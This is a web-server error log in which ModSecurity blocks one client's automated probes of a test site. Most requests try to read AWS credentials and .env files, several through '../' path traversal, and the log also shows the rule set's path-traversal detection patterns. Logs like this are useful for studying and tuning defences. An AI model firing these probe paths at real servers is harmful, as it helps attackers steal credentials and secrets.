[Tue May 06 14:10:51.581590 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aBn8S6LEXg5QrJj263MM4AAAAAc"]
[Tue May 06 14:10:52.663032 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /mgmt/shared/authn/login/root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aBn8TKLEXg5QrJj263MM4QAAAAc"]
[Tue May 06 14:10:52.663248 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aBn8TKLEXg5QrJj263MM4QAAAAc"]
[Tue May 06 14:10:52.663452 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aBn8TKLEXg5QrJj263MM4QAAAAc"]
[Tue May 06 14:10:53.506901 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aBn8TaLEXg5QrJj263MM4gAAAAc"]
[Tue May 06 14:10:53.507114 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aBn8TaLEXg5QrJj263MM4gAAAAc"]
[Tue May 06 14:10:53.507328 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aBn8TaLEXg5QrJj263MM4gAAAAc"]
[Tue May 06 14:10:54.637856 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aBn8TqLEXg5QrJj263MM4wAAAAc"]
[Tue May 06 14:10:54.637923 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aBn8TqLEXg5QrJj263MM4wAAAAc"]
[Tue May 06 14:10:54.637959 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aBn8TqLEXg5QrJj263MM4wAAAAc"]
[Tue May 06 14:10:54.638615 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aBn8TqLEXg5QrJj263MM4wAAAAc"]
[Tue May 06 14:10:54.638826 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php/core/preview"] [unique_id "aBn8TqLEXg5QrJj263MM4wAAAAc"]
[Tue May 06 14:10:55.468653 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBn8T6LEXg5QrJj263MM5AAAAAc"]
[Tue May 06 14:10:55.468960 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBn8T6LEXg5QrJj263MM5AAAAAc"]
[Tue May 06 14:10:55.469224 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aBn8T6LEXg5QrJj263MM5AAAAAc"]
[Tue May 06 14:10:56.367237 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aBn8UKLEXg5QrJj263MM5QAAAAc"]
[Tue May 06 14:10:56.367560 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aBn8UKLEXg5QrJj263MM5QAAAAc"]
[Tue May 06 14:10:56.367863 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aBn8UKLEXg5QrJj263MM5QAAAAc"]
[Tue May 06 14:10:57.283191 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aBn8UaLEXg5QrJj263MM5gAAAAc"]
[Tue May 06 14:10:57.283448 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aBn8UaLEXg5QrJj263MM5gAAAAc"]
[Tue May 06 14:10:57.283646 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aBn8UaLEXg5QrJj263MM5gAAAAc"]
[Tue May 06 14:11:02.842149 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aBn8VqLEXg5QrJj263MM6AAAAAc"]
[Tue May 06 14:11:02.842393 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aBn8VqLEXg5QrJj263MM6AAAAAc"]
[Tue May 06 14:11:02.842565 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aBn8VqLEXg5QrJj263MM6AAAAAc"]
[Tue May 06 14:11:03.764179 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aBn8V6LEXg5QrJj263MM6QAAAAc"]
[Tue May 06 14:11:03.764390 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aBn8V6LEXg5QrJj263MM6QAAAAc"]
[Tue May 06 14:11:03.764573 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aBn8V6LEXg5QrJj263MM6QAAAAc"]
[Tue May 06 14:11:04.530155 2025] [authz_core:error] [pid 2959452] [client 94.26.90.191:45034] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Tue May 06 14:11:05.591580 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aBn8WaLEXg5QrJj263MM6wAAAAc"]
[Tue May 06 14:11:05.591813 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aBn8WaLEXg5QrJj263MM6wAAAAc"]
[Tue May 06 14:11:05.592038 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aBn8WaLEXg5QrJj263MM6wAAAAc"]
[Tue May 06 14:11:06.491876 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aBn8WqLEXg5QrJj263MM7AAAAAc"]
[Tue May 06 14:11:06.492109 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aBn8WqLEXg5QrJj263MM7AAAAAc"]
[Tue May 06 14:11:06.493026 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aBn8WqLEXg5QrJj263MM7AAAAAc"]
[Tue May 06 14:11:10.828566 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aBn8XqLEXg5QrJj263MM7gAAAAc"]
[Tue May 06 14:11:10.828784 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aBn8XqLEXg5QrJj263MM7gAAAAc"]
[Tue May 06 14:11:10.828957 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aBn8XqLEXg5QrJj263MM7gAAAAc"]
[Tue May 06 14:11:11.651508 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /library/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aBn8X6LEXg5QrJj263MM7wAAAAc"]
[Tue May 06 14:11:11.651725 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aBn8X6LEXg5QrJj263MM7wAAAAc"]
[Tue May 06 14:11:11.652586 2025] [:error] [pid 2959452] [client 94.26.90.191:45034] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/library/.env"] [unique_id "aBn8X6LEXg5QrJj263MM7wAAAAc"]
